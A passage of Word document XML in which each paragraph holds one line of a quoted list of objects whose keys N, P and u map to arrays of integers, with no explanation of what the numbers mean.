      <w:r>
        <w:t>&gt;&gt;         u: [11, 12, 19, 306]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F966812" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58234983" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC811A9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025A6FE4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62833C17" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA53C63" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610A805F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2, 3, 5, 6, 7, 8, 9],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEBB79E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 4, 19, 37, 89, 128, 329]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF012F2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6813B324" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CC5534" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2, 3, 4, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77ED7FA8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 8, 13, 18, 20, 21, 67, 90, 109, 131, 159, 173, 252, 311, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D475314" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644B1AA1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30496FC6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         g: 5,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C51DE3E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC7A5CC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 3, 4, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75306291" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C423E40" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745AF48A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6064436C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         P: [1, 2, 3, 4, 5, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017B78A7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 21, 159]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D06027" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D05AEEE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E14C219" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D66E045" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 6, 8, 23]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB690D4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDF0615" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F93137" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE1DFCD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 6, 7, 10]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405386A0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F608915" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1577C61F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [2, 3, 6, 7],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF83E6C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 4, 5, 9]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047F80B1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A78B668" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FA7EC8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 4, 6, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 28, 29],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDEB80A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [3, 5, 7, 8, 27, 32, 40, 179, 223, 227, 337]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A473B5C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BD2FA1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D93350" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C927FC5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3C7E23" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABFC8D3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8824C3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F72C14" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C62A993" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4010299E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47197B99" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A77752" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [14, 19]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E995D5B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9F3A5C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138EAE25" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2, 3, 5, 6, 7, 8],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BB894C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 4, 19, 37, 89, 128, 329]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8F09DE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067A5AA6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF45358" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2E23EC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [6, 19]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B24DD1D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00438D36" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8D04D8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFF9D19" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [9]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3AAD03" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490C1944" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703222FC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E752338" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 10, 67, 159, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED4F6FA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B13DAA4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B7AF4D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CD0220" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD767B4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B25BAE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0273DC49" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D6873B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [26]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0EAA72" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AD90E2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [318],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149C1428" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165,166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 253, 254, 255, 256, 257, 258, 259, 260, 261, 262, 263, 264, 265, 266, 267, 268, 269, 270, 271, 272, 273, 274, 275, 276, 277, 278, 279, 280, 281, 282, 283, 284, 285, 286, 287, 288, 289, 290, 291, 292, 293, 294, 295, 296, 297, 298, 299, 300, 301, 302, 303, 304, 305, 306, 307, 308, 309, 310, 311, 312,313, 314, 315, 316, 317, 318, 319, 320, 321, 322, 323, 324, 325, 326, 327, 328, 329, 330, 331, 332, 333, 334, 335, 336, 337, 338, 339, 340, 341, 342, 343, 344, 345, 346, 347, 348, 349, 350, 351, 352, 353, 354, 355, 356],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BE0525" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED82247" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A7BC5C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F1E29A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378EE4DE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEEF7F5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAB64A6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0340E47D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8A3B04" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         u: [51, 169]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3106FDB8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74405096" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [3, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6260750A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 14, 15, 16, 17, 18, 19],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2976E5DD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [13, 27, 29, 71, 78, 97, 108, 110, 134, 136, 215, 232, 260, 298, 319, 355]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515D11F8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A874A41" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3338A6C9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F633A93" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [8]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCACCCE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1FC58A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEA1CA5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C59B3CA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [13, 16, 20, 29, 159, 311, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78534204" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D189A67" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E81A24" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3F9DD0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1595FA06" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A57A44" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2850647C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [2, 4, 6, 7],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2BC476" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 3, 5, 11]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1CAD6C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1035D7D0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA4F64A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 3, 11, 15, 16],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8969C5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2, 4, 5, 6, 7, 8, 9, 10, 12, 13, 14]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AB9231" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121443A9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         N: [2, 0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E74666A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4289B6F1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [101, 312, 319]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383C0B80" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72920011" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661992D2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E226BDC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
